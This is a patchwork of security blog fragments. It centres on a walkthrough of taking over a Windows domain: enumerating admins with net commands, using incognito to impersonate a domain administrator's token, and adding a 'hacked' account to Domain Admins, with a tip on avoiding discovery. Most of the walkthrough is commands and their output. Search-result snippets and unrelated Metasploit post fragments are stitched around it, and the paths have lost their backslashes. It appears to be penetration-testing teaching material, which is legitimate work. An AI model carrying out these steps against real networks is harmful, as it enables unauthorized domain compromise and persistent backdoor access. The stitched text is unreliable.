So I was doing a little vanity googling and came across something rather weird in the results:
#
Attack Research | Defense Is Dead
Valsmith decided to found this site after leaving Offensive Computing with a ... simple malware analysis into the larger world of total attack research. ...
www.cntradecity.com/ - 15k - Cached - Similar pages -
#
Attack Research
Attack Research. Soon. | valsmith@metasploit.com |
www.cntradeshop.com/ - 1k - Cached - Similar pages -
#
Attack Research
Attack Research. Soon. | valsmith@metasploit.com |
I recommend double clicking the video and watching it in full screen so its somewhat legible. This video walks through an example of attacking a windows domain. This post also contains a textual walk through.
V.
Get administrator rights on a workstation which is on a windows domain using whatever method you can find. (exploit, stolen password, smbrelay, phishing, etc). Look for the domain server. There are a variety of ways to do this. You can arp -a to find active IP's or ping scan the network and then use the nbtstat tool to look for the right domain controller identifier or an obvious hostname.
You can also browse the network neighborhood or use the net view command.
Aquiring and cracking the hashes of your target is generally useful as well.
Enumerate group membership so you know who to target.
Get the usernames in the local administrators group:
C:WINDOWSsystem32>net localgroup administrators
net localgroup administrators
Alias name administrators
Comment Administrators have complete and unrestricted access to the computer/domain
Members
--------------------------------------
Administrator
BLACKHATDomain Admins
hacked
local_valsmith
root
The command completed successfully.
Enumerate the domain admins
C:WINDOWSsystem32>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain blackhat.com.
Group name Domain Admins
Comment Designated administrators of the domain
Members
---------------------------------------------------
admin_valsmith Administrator
The command completed successfully.
So admin_valsmith is our target domain admin. Lets say the workstation we hacked is on 172.16.1.10. We now need to find out of there are any security tokens we can access.
c:incognito>incognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 list_tokens -u
[*] Attempting to establish new connection to \172.16.1.10IPC$
[*] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-FC12020A7EED}
[*] Redirecting I/O to remote process
[*] Enumerating tokens
[*] Listing unique users found...
Delegation Tokens Available
==========================================
NT AUTHORITYLOCAL SERVICE
NT AUTHORITYNETWORK SERVICE
NT AUTHORITYSYSTEM
XPCLIENTlocal_valsmith
Impersonation Tokens Available
==========================================
BLACKHATadmin_valsmith
NT AUTHORITYANONYMOUS LOGON
[*] Service shutdown detected. Service executable file deleted
[*] Deleting service
So admin_valsmith is our target domain administrator and an impersonation token is available to us!
The above command assumes we have cracked the hash of the local admin and retrieved the password. This will connect to IPC$ share on the target and list any tokens that are available.
Next we will utilize this token to gain domain admin rights:
C:incognitoincognito -h 172.16.1.10 -u local_valsmith -p D0nth3ckm3 execute -c "blackhatadmin_valsmith" cmd
[*] Attempting to establish new connection to \172.16.1.10IPC$
[+] Logon to \172.16.1.10IPC$ succeeded
[*] Copying service to \172.16.1.10
[+] Existing service found and opend successfully
[*] Starting service
[+] Service started
[*] Connecting to incognito service named pipe
[+] Successfully connected to named pipe {3A864C7A-77E3-4092-BF4A-9047A294CE6D}
[*] Redirecting I/O to remote process
[*] Enumerating tokens
[*] Searching for availability of requested token
[+] Requested token found
[-] No Delegation token available
[*] Attempting to create new child process and communicate via anonymous pipe
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>whoami
whoami
admin_valsmith
So we now have a shell with the rights of the domain administrator. We will add an account to the domain controller to demonstrate our access:
C:net user hacked 0h3ck3d! /add /domain
net user hacked 0h3cked! /add /domain
The request will be processed at a domain controller for domain blackhat.com.
The command completed successfully.
Now we want to add our account to the domain admin group. NOTE: often you don't want to add an account, especially one named hacked as it is likely to be discovered by the admins.
C:net group "domain admins" hacked /add /domain
net group "domain admins" hacked /add /domain
The reuqest will be processed at a domain controller for domain blackhat.com
The command completed successfully.
At this point we have control over the domain and can likely log into any workstation which is on the domain.
I was explaining some of this to a friend and figured I'd just post it...
If you have ever looked at an exploit module in metasploit most, if not all, will be calling additional libraries to actually "do" what the work for the exploit --this is actually what makes MSF so great.
There has been some talk about using the SMB Relay module in Metasploit and then trying to crack those hashes. I'll spare the links to protect the uninformed.
The SMB Relay module is for doing just what it says, relaying the SMB session back to another host. It used to be the same host but now, post 08-068, you have to pick another system on the network. Doesn't matter what system, just not the same system. (I'll try to cover this in another blog post soon)
In previous posts here at Carnal0wnage, CG has diligently covered using MSF and meterpreter to do all kinds of stuff, including grabbing hashes with the Priv extension (Vinnie Liu) and tokens with the Incognito extension (Luke Jennings). These are powerful post-exploitation features that yield invaluable information to the engaging team, therefore the presentation and accessibility of this data becomes an important factor as the scale of the engagement and number of targets grows.
We'll be talking about why you should be allowing your penetration testers to use client-side attacks during their assessments , how to use the metasploit framework to deliver client-side attacks with demos (yes other tools do CS attacks but we're poor), and some remediations for client-side attacks.
